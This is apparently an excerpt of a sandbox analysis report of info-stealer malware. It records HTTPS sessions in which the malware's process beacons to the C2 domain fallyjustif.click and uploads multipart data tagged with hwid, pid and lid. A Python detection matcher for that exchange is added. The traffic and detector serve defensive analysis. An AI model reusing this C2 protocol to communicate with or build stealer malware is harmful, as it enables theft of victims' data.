Dec 28, 2024 21:36:14.548464060 CET | 1.1.1.1 | 192.168.2.5 | 0x9ebc | No error (0) | rentry.co | | 104.26.3.16 | A (IP address) | IN (0x0001) | false
                                                            • fallyjustif.click
                                                            • rentry.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49784 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
Timestamp | Bytes transferred | Direction | Data
2024-12-28 20:35:57 UTC | 264 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: fallyjustif.click
2024-12-28 20:35:57 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-28 20:35:57 UTC | 1136 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:35:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=fhc305o6o1ln9jomsgsqh628ar; expires=Wed, 23 Apr 2025 14:22:36 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GWWVKRIsZEk%2FntwYH1rJto8M%2FiBuiW%2BG4FcvKJh%2FrDhN3jYrndZqGoVa%2B9PQnhWx4wg3YrpbuKi26BDuvpus%2BJLONAdfHnRrQAJn9cdkzbK2l7ucFEyoLbXwFDhIwvgY97FCeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9456fb19054401-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1710&rtt_var=649&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2840&recv_bytes=908&delivery_rate=1676234&cwnd=233&unsent_bytes=0&cid=6ef43b0890a5092e&ts=1046&x=0"
2024-12-28 20:35:57 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                            Data Ascii: 2ok
2024-12-28 20:35:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0
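
Session 0 above and session 1 below are one protocol: a form-encoded POST to /api on fallyjustif.click, first `act=life` (answered with the chunked body `2\r\nok\r\n0\r\n\r\n`, rendered as `2ok` once the CRLFs are stripped), then `act=recive_message&ver=4.0&lid=...&j=` (answered with a large base64 blob whose first chunk is `c52` hex bytes). The following is an added example and not part of the Joe Sandbox report: a minimal HTTP request parser, a chunked-body decoder run over the hex dump from session 0, and a matcher for this exchange as a detection rule would see it. The request bytes are reconstructed from the data shown (header subset only); the third request is a constructed negative control and its host `example.test` is an assumption; the misspelled `recive_message` is kept exactly as it appears on the wire.

```python
from urllib.parse import parse_qs

# Constructed from sessions 0 and 1 above (added example, not report data
# verbatim): request line, the relevant headers and the form bodies. The third
# request is an invented negative control that must NOT match.
REQUESTS = [
    b"POST /api HTTP/1.1\r\nHost: fallyjustif.click\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 8\r\n\r\n"
    b"act=life",
    b"POST /api HTTP/1.1\r\nHost: fallyjustif.click\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 49\r\n\r\n"
    b"act=recive_message&ver=4.0&lid=MeHdy4--pl1new1&j=",
    b"POST /api HTTP/1.1\r\nHost: example.test\r\n"
    b"Content-Type: application/json\r\nContent-Length: 12\r\n\r\n"
    b'{"act":"ok"}',
]

# The two inbound Data Raw segments of session 0, concatenated: the chunked
# response body that the report shows as "2ok" and "0".
RESPONSE_BODY_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"


def parse_request(raw):
    """Split one HTTP/1.1 request into method, path, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def decode_chunked(data):
    """Decode an HTTP/1.1 chunked body; raises ValueError on bad framing."""
    out = b""
    pos = 0
    while True:
        end = data.index(b"\r\n", pos)            # ValueError if no size line
        size = int(data[pos:end].split(b";")[0], 16)  # drop chunk extensions
        pos = end + 2
        if size == 0:                             # last-chunk marker
            return out
        out += data[pos:pos + size]
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk not CRLF-terminated")
        pos += size + 2


def c2_beacon_match(req):
    """Match the POST /api form exchange seen in the sessions above.

    Returns ("life", None) for the keepalive, (act, lid) for the
    recive_message request carrying ver and lid, and None otherwise.
    """
    if req["method"] != "POST" or req["path"] != "/api":
        return None
    ctype = req["headers"].get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return None
    form = parse_qs(req["body"].decode("latin-1"), keep_blank_values=True)
    act = form.get("act", [None])[0]
    if act == "life":
        return ("life", None)
    if act == "recive_message" and "ver" in form and "lid" in form:
        return (act, form["lid"][0])
    return None


def scan(requests):
    """Run the matcher over a list of raw requests."""
    return [c2_beacon_match(parse_request(r)) for r in requests]


if __name__ == "__main__":
    print(scan(REQUESTS))
    print(decode_chunked(bytes.fromhex(RESPONSE_BODY_HEX.replace(" ", ""))))
```

The matcher deliberately keys on the combination (POST, `/api`, form encoding, `act` plus `ver`/`lid` fields) rather than on the hostname, because the report's own DNS table shows the domain resolving to Cloudflare addresses that will not survive a rotation; the `lid` value it extracts is the per-build identifier worth pivoting on in other samples. In a TLS-intercepting proxy or sandbox export this is usable as-is; on the wire the exchange is inside HTTPS, so the flow-timing heuristic and the destination pivot are what remain.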


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49790 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
Timestamp | Bytes transferred | Direction | Data
2024-12-28 20:35:59 UTC | 265 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 49
                                                            Host: fallyjustif.click
2024-12-28 20:35:59 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl1new1&j=
2024-12-28 20:35:59 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:35:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=1qngvvl0pqftusc86m6e462kbs; expires=Wed, 23 Apr 2025 14:22:38 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFXc5Q2Y3NfhkHiFxObHMzTPSmaM2N8B%2FzHac7Beu4Dq1xYqCuzhKn4u1iaQgL4o7PlKCoAKy6ROLqrjdhylfyIKnw5q0MvmK2fFj8vJiW%2FiMynZS58jU5F%2BNAcpngmTkHXbAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f9457082c3232e4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1790&rtt_var=683&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=950&delivery_rate=1589548&cwnd=162&unsent_bytes=0&cid=48086fa7ee858bfe&ts=757&x=0"
2024-12-28 20:35:59 UTC | 240 | IN | Data Raw: 63 35 32 0d 0a 6f 51 67 69 39 6a 64 78 37 63 56 5a 4a 6c 38 48 66 6b 51 79 66 6c 49 66 72 66 74 4c 4e 42 48 48 6b 62 5a 58 70 41 38 69 52 49 72 61 4b 6c 54 55 44 55 58 42 35 79 70 44 66 54 30 4b 4e 6b 63 62 66 6a 33 4d 6e 32 6b 4f 64 36 62 39 78 54 4b 49 4c 56 51 70 71 4a 74 75 51 35 70 45 46 4d 48 6e 50 46 35 39 50 53 55 2f 45 42 73 38 50 5a 66 5a 4c 6c 35 7a 70 76 33 55 4e 73 39 67 55 69 6a 70 79 57 52 46 6e 6c 49 53 69 61 51 31 53 7a 70 69 47 79 56 59 45 44 74 79 78 5a 5a 70 47 44 4f 69 36 35 52 74 68 6b 4a 48 4d 4f 76 73 61 56 47 64 46 51 7a 42 76 6e 74 44 4d 53 56 45 5a 6c 4d 62 4d 48 50 4c 6e 79 42 63 65 61 2f 31 31 54 50 4f 66 30 73 69 34 73 6c 71 52 70 39 59 47 35 32 70 50 30 77 78 5a 42 45 6c 45 46 4a
                                                            Data Ascii: c52oQgi9jdx7cVZJl8HfkQyflIfrftLNBHHkbZXpA8iRIraKlTUDUXB5ypDfT0KNkcbfj3Mn2kOd6b9xTKILVQpqJtuQ5pEFMHnPF59PSU/EBs8PZfZLl5zpv3UNs9gUijpyWRFnlISiaQ1SzpiGyVYEDtyxZZpGDOi65RthkJHMOvsaVGdFQzBvntDMSVEZlMbMHPLnyBcea/11TPOf0si4slqRp9YG52pP0wxZBElEFJ
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 77 65 74 66 5a 63 52 59 67 6c 2f 44 46 4a 4e 4e 67 55 43 43 6f 33 43 52 5a 31 46 49 66 7a 2f 39 37 54 44 46 72 47 53 56 66 47 7a 46 39 33 5a 59 70 56 58 75 74 39 39 34 36 79 57 4a 4f 4c 4f 2f 4c 59 30 65 62 55 68 75 4a 71 44 67 45 63 79 55 62 50 68 42 45 63 46 33 66 6d 69 70 43 66 72 53 7a 79 33 76 66 4c 55 63 71 71 4a 73 71 52 70 70 55 48 6f 2b 31 4d 30 38 32 59 41 34 74 57 52 45 39 66 63 4b 54 4a 6c 56 7a 6f 76 6e 65 4f 73 78 70 54 53 76 75 77 32 6f 41 32 68 55 55 6c 2b 64 6a 42 42 35 67 44 43 46 63 43 6e 4a 48 6a 34 5a 6e 54 7a 4f 69 2f 35 52 74 68 6d 56 46 4a 65 76 49 5a 55 4f 63 58 67 47 50 74 54 31 4a 4f 48 63 61 49 31 34 57 4d 32 2f 46 6c 79 39 56 65 71 37 36 30 54 4c 43 4c 51 35 6d 37 39 73 71 47 4e 52 30 48 6f 53 72 4d 56 4d 39 4a 51 4e 6f 53 56
                                                            Data Ascii: wetfZcRYgl/DFJNNgUCCo3CRZ1FIfz/97TDFrGSVfGzF93ZYpVXut9946yWJOLO/LY0ebUhuJqDgEcyUbPhBEcF3fmipCfrSzy3vfLUcqqJsqRppUHo+1M082YA4tWRE9fcKTJlVzovneOsxpTSvuw2oA2hUUl+djBB5gDCFcCnJHj4ZnTzOi/5RthmVFJevIZUOcXgGPtT1JOHcaI14WM2/Fly9Veq760TLCLQ5m79sqGNR0HoSrMVM9JQNoSV
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 6b 79 39 5a 66 71 6d 7a 6d 6e 58 42 64 51 42 2b 71 4f 6c 70 56 4a 64 66 55 62 71 6b 4e 55 6f 36 63 31 77 35 48 67 56 77 65 73 50 5a 63 52 5a 2b 70 50 76 53 4a 38 6c 67 51 79 6a 6d 7a 47 39 50 6e 46 55 54 67 71 49 2f 54 7a 5a 6d 45 53 4a 43 46 6a 42 31 79 70 67 6a 58 44 50 72 73 39 4d 74 68 6a 55 41 46 2f 2f 49 4b 48 57 58 57 78 32 49 73 58 74 62 63 33 78 63 49 56 78 63 61 44 33 43 6b 53 78 54 66 4b 54 35 32 6a 44 4d 59 55 67 6f 36 39 46 6c 52 4a 52 5a 47 34 57 71 4e 55 41 31 62 42 63 74 56 68 77 78 64 34 2f 58 61 56 46 72 35 61 75 55 41 63 46 68 54 53 6d 71 39 6d 6c 4f 6d 6c 49 46 7a 37 68 31 58 58 31 69 45 47 59 49 58 44 78 30 7a 35 49 6a 55 6e 4f 69 2f 74 45 32 77 57 35 4e 49 65 4c 4e 62 55 53 59 58 42 36 4a 70 7a 78 41 4f 48 63 5a 4c 31 77 51 63 44 4f
                                                            Data Ascii: ky9ZfqmzmnXBdQB+qOlpVJdfUbqkNUo6c1w5HgVwesPZcRZ+pPvSJ8lgQyjmzG9PnFUTgqI/TzZmESJCFjB1ypgjXDPrs9MthjUAF//IKHWXWx2IsXtbc3xcIVxcaD3CkSxTfKT52jDMYUgo69FlRJRZG4WqNUA1bBctVhwxd4/XaVFr5auUAcFhTSmq9mlOmlIFz7h1XX1iEGYIXDx0z5IjUnOi/tE2wW5NIeLNbUSYXB6JpzxAOHcZL1wQcDO
                                                            2024-12-28 20:35:59 UTC183INData Raw: 54 32 38 73 39 4d 35 68 6a 55 41 4c 2b 48 52 5a 45 36 64 57 42 57 48 6f 44 56 4a 4e 6d 4d 58 49 56 63 61 50 58 58 43 6e 43 70 58 64 36 2f 68 31 7a 37 4d 59 45 70 6d 70 6f 4e 74 57 4e 51 4e 55 36 69 72 45 6c 51 6d 64 77 70 6d 54 31 49 70 50 63 69 56 61 51 34 7a 70 76 7a 64 4f 73 35 6c 54 79 6e 73 7a 57 78 47 6d 56 41 63 68 62 55 7a 53 6a 42 75 45 79 31 43 48 44 31 35 77 35 30 68 58 58 6e 6c 76 5a 51 79 33 69 30 59 5a 74 33 4f 5a 55 43 58 51 31 4f 51 36 53 49 45 4f 6d 6c 63 66 68 41 51 50 6e 33 41 6c 53 56 64 65 36 54 2f 32 6a 4c 44 5a 45 0d 0a
                                                            Data Ascii: T28s9M5hjUAL+HRZE6dWBWHoDVJNmMXIVcaPXXCnCpXd6/h1z7MYEpmpoNtWNQNU6irElQmdwpmT1IpPciVaQ4zpvzdOs5lTynszWxGmVAchbUzSjBuEy1CHD15w50hXXnlvZQy3i0YZt3OZUCXQ1OQ6SIEOmlcfhAQPn3AlSVde6T/2jLDZE
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 33 64 34 32 0d 0a 67 75 2b 73 4a 75 53 4a 56 62 48 49 36 6a 50 6b 45 35 59 68 67 67 58 31 78 2b 50 63 69 42 61 51 34 7a 69 74 54 68 64 2b 64 58 41 44 6d 6d 32 69 70 48 6d 42 56 4c 7a 36 73 34 53 44 56 71 47 69 39 63 46 6a 6c 32 77 35 49 74 57 6e 71 67 39 64 55 77 77 32 78 45 4b 75 4c 46 61 55 4f 62 57 68 79 48 35 33 55 45 4f 6e 31 63 66 68 41 35 4a 33 62 42 6e 32 6c 4a 50 62 79 7a 30 7a 6d 47 4e 51 41 71 34 63 56 73 52 5a 68 55 46 59 65 69 4d 30 41 38 59 78 6f 6c 58 78 67 31 66 4d 43 64 4a 56 68 35 70 50 4c 59 50 73 6c 6d 52 57 61 6d 67 32 31 59 31 41 31 54 76 71 51 74 55 79 31 70 58 44 6b 65 42 58 42 36 77 39 6c 78 46 6e 4b 33 2b 64 34 37 77 32 4a 46 4a 65 66 45 5a 30 61 59 58 78 71 48 6f 54 52 4e 4c 32 59 51 4b 46 63 53 50 48 50 43 6b 79 70 62 4d 2b 75
                                                            Data Ascii: 3d42gu+sJuSJVbHI6jPkE5YhggX1x+PciBaQ4zitThd+dXADmm2ipHmBVLz6s4SDVqGi9cFjl2w5ItWnqg9dUww2xEKuLFaUObWhyH53UEOn1cfhA5J3bBn2lJPbyz0zmGNQAq4cVsRZhUFYeiM0A8YxolXxg1fMCdJVh5pPLYPslmRWamg21Y1A1TvqQtUy1pXDkeBXB6w9lxFnK3+d47w2JFJefEZ0aYXxqHoTRNL2YQKFcSPHPCkypbM+u
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 57 70 4c 4c 75 50 4d 62 46 4b 59 57 77 47 4b 74 53 6b 45 63 79 55 62 50 68 42 45 63 45 76 49 69 54 6c 56 4d 5a 54 6c 31 79 50 4e 59 45 78 6d 39 34 31 7a 41 4a 4e 5a 55 39 66 6e 50 55 73 30 5a 68 4d 6e 57 52 41 39 65 4d 61 63 4b 46 42 33 72 2f 6e 55 4d 38 42 73 52 53 7a 72 77 6d 42 4a 6b 31 30 55 6a 4c 56 37 43 6e 31 69 42 47 59 49 58 42 6c 36 33 5a 63 35 46 6d 7a 72 36 70 51 79 79 69 30 59 5a 75 7a 4a 5a 55 53 54 57 52 57 4b 6f 54 5a 46 4d 6d 51 63 4b 56 51 58 4f 58 76 4f 6c 43 78 62 64 37 66 35 33 7a 72 4b 5a 45 77 72 71 49 30 71 52 34 77 56 53 38 2b 57 4e 6b 6f 7a 59 67 70 6d 54 31 49 70 50 63 69 56 61 51 34 7a 70 50 2f 62 4e 73 6c 75 51 79 66 69 30 58 68 4d 6e 56 30 57 67 36 77 31 51 69 39 6a 45 79 39 54 48 7a 6c 36 78 35 55 6a 56 58 54 6c 76 5a 51 79
                                                            Data Ascii: WpLLuPMbFKYWwGKtSkEcyUbPhBEcEvIiTlVMZTl1yPNYExm941zAJNZU9fnPUs0ZhMnWRA9eMacKFB3r/nUM8BsRSzrwmBJk10UjLV7Cn1iBGYIXBl63Zc5Fmzr6pQyyi0YZuzJZUSTWRWKoTZFMmQcKVQXOXvOlCxbd7f53zrKZEwrqI0qR4wVS8+WNkozYgpmT1IpPciVaQ4zpP/bNsluQyfi0XhMnV0Wg6w1Qi9jEy9THzl6x5UjVXTlvZQy
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 48 33 6a 58 4d 41 6b 31 6c 54 31 2b 63 39 54 54 74 69 47 69 68 43 47 54 5a 79 77 4a 41 67 55 6e 75 6d 38 39 41 78 77 57 68 44 4b 75 50 45 61 55 2b 51 58 42 32 47 71 48 73 4b 66 57 49 45 5a 67 68 63 45 57 62 4d 6c 53 51 57 62 4f 76 71 6c 44 4c 4b 4c 52 68 6d 35 4d 31 76 51 4a 35 54 46 34 71 68 4d 55 45 39 62 68 38 70 56 42 6f 30 63 73 2b 53 49 46 64 31 6f 50 6e 66 4d 38 74 75 52 69 43 6f 6a 53 70 48 6a 42 56 4c 7a 34 63 67 53 54 46 69 58 44 6b 65 42 58 42 36 77 39 6c 78 46 6e 69 70 39 39 4d 31 79 32 35 49 49 2b 7a 4a 62 30 43 63 52 78 75 50 6f 43 6c 57 50 57 77 5a 4b 6c 4d 63 4e 48 76 47 6e 79 70 53 4d 2b 75 7a 30 79 32 47 4e 51 41 4c 35 4d 52 44 52 34 38 56 44 4d 47 2b 65 30 4d 78 4a 55 52 6d 55 52 63 36 63 73 4b 61 4c 31 56 34 6f 50 6e 56 4d 73 35 67 55
                                                            Data Ascii: H3jXMAk1lT1+c9TTtiGihCGTZywJAgUnum89AxwWhDKuPEaU+QXB2GqHsKfWIEZghcEWbMlSQWbOvqlDLKLRhm5M1vQJ5TF4qhMUE9bh8pVBo0cs+SIFd1oPnfM8tuRiCojSpHjBVLz4cgSTFiXDkeBXB6w9lxFnip99M1y25II+zJb0CcRxuPoClWPWwZKlMcNHvGnypSM+uz0y2GNQAL5MRDR48VDMG+e0MxJURmURc6csKaL1V4oPnVMs5gU
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 6b 41 49 59 56 53 38 2f 67 4f 46 59 76 59 78 38 77 55 31 73 4f 51 2b 69 50 49 31 46 6a 6f 75 54 62 64 59 67 74 54 32 61 77 2b 69 70 4a 6b 30 34 43 6d 61 6f 72 51 33 31 61 55 6d 5a 49 58 47 67 39 2b 70 6f 6e 57 48 53 7a 34 70 6b 53 30 47 64 48 4e 75 2f 55 5a 51 44 61 46 52 58 50 2f 32 67 4b 66 57 45 4e 5a 67 68 4d 59 69 61 61 79 6e 34 47 49 62 71 39 7a 58 58 51 4c 52 68 30 70 6f 4e 34 41 4d 77 56 56 49 79 31 4b 55 49 2b 63 78 39 68 62 69 49 58 5a 38 4b 66 50 6b 64 4e 6d 2f 54 4f 4f 4d 42 36 55 57 72 39 77 47 52 4f 6b 30 4e 54 77 65 63 30 42 47 56 63 58 47 34 51 49 33 34 39 31 39 6c 78 46 6b 61 6d 2f 64 6f 79 30 48 77 4e 41 66 4c 4f 62 46 65 46 46 56 33 50 6f 58 73 63 62 79 74 63 49 6b 46 63 61 43 32 64 77 6e 77 46 4a 50 57 68 79 33 76 66 4c 56 5a 6d 73 4a
                                                            Data Ascii: kAIYVS8/gOFYvYx8wU1sOQ+iPI1FjouTbdYgtT2aw+ipJk04CmaorQ31aUmZIXGg9+ponWHSz4pkS0GdHNu/UZQDaFRXP/2gKfWENZghMYiaayn4GIbq9zXXQLRh0poN4AMwVVIy1KUI+cx9hbiIXZ8KfPkdNm/TOOMB6UWr9wGROk0NTwec0BGVcXG4QI34919lxFkam/doy0HwNAfLObFeFFV3PoXscbytcIkFcaC2dwnwFJPWhy3vfLVZmsJ
                                                            2024-12-28 20:35:59 UTC1369INData Raw: 46 55 76 50 6b 6a 68 4b 4d 32 49 4b 4e 78 30 30 45 30 66 31 32 77 56 52 5a 75 66 48 30 79 58 58 5a 6b 30 71 71 49 30 71 52 74 51 4e 51 38 48 6e 50 31 56 39 50 55 78 30 43 30 6c 6a 4b 70 2f 4c 4e 68 68 71 35 65 57 55 62 5a 51 6a 41 44 53 6f 6d 79 6f 48 6c 30 63 42 69 61 51 74 52 33 70 62 49 67 46 65 47 7a 46 72 33 34 34 6d 61 45 32 77 38 4e 6f 37 77 58 74 52 5a 71 61 44 5a 51 44 4d 62 46 50 48 35 77 51 4b 66 58 31 63 66 68 41 70 4d 33 50 42 6e 6a 39 48 50 6f 4c 39 30 7a 54 51 66 56 63 70 71 49 30 71 52 74 51 4e 51 63 48 6e 50 31 56 39 50 55 78 30 43 30 6c 6a 4b 70 2f 4c 4e 68 68 71 35 65 57 55 62 5a 51 6a 41 44 53 6f 6d 79 6f 48 6c 30 63 42 69 61 51 74 52 33 70 62 49 67 46 65 47 7a 46 72 33 34 34 6d 47 56 32 54 30 75 6f 4c 30 32 35 4f 4b 4f 2f 56 65 77 44
                                                            Data Ascii: FUvPkjhKM2IKNx00E0f12wVRZufH0yXXZk0qqI0qRtQNQ8HnP1V9PUx0C0ljKp/LNhhq5eWUbZQjADSomyoHl0cBiaQtR3pbIgFeGzFr344maE2w8No7wXtRZqaDZQDMbFPH5wQKfX1cfhApM3PBnj9HPoL90zTQfVcpqI0qRtQNQcHnP1V9PUx0C0ljKp/LNhhq5eWUbZQjADSomyoHl0cBiaQtR3pbIgFeGzFr344mGV2T0uoL025OKO/VewD


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.5 | 49797 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:01 UTC | 282 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=LMN9VRPDP5JIZR2K4
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 12831
                                                            Host: fallyjustif.click
                                                            2024-12-28 20:36:01 UTC12831OUTData Raw: 2d 2d 4c 4d 4e 39 56 52 50 44 50 35 4a 49 5a 52 32 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 37 37 31 34 32 45 33 38 37 45 39 30 37 32 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 4c 4d 4e 39 56 52 50 44 50 35 4a 49 5a 52 32 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 4d 4e 39 56 52 50 44 50 35 4a 49 5a 52 32 4b 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d
                                                            Data Ascii: --LMN9VRPDP5JIZR2K4Content-Disposition: form-data; name="hwid"1B77142E387E90721441EDD8E05CE3DA--LMN9VRPDP5JIZR2K4Content-Disposition: form-data; name="pid"2--LMN9VRPDP5JIZR2K4Content-Disposition: form-data; name="lid"MeHdy4--pl1new1
                                                            2024-12-28 20:36:02 UTC | 1138 | IN | HTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 20:36:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=miih2nvl56jpd6248k1cto38fu; expires=Wed, 23 Apr 2025 14:22:40 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            X-Frame-Options: DENY
                                                            X-Content-Type-Options: nosniff
                                                            X-XSS-Protection: 1; mode=block
                                                            cf-cache-status: DYNAMIC
                                                            vary: accept-encoding
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TlJFwdQJJfxopTVCB6ioet6zImDJ1zayDc%2FVmxXnu%2BneXQY%2FnJxzczl2pItQ3ST%2FdvkPxxBDVAKSTEn9AHAItT31hJd%2B19jxjzOhcMDmOYMQoxkvL6H%2Fmpqc4aDWceOTpkdJEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f945715bc0f0f59-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1462&rtt_var=580&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=13771&delivery_rate=1835323&cwnd=221&unsent_bytes=0&cid=26a810abc597d697&ts=915&x=0"
                                                            2024-12-28 20:36:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                            Data Ascii: fok 8.46.123.189
                                                            2024-12-28 20:36:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.5 | 49803 | 172.67.213.115 | 443 | 6460 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-12-28 20:36:03 UTC | 276 | OUT | POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=NXVOOFBV7DO
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 15037
                                                            Host: fallyjustif.click
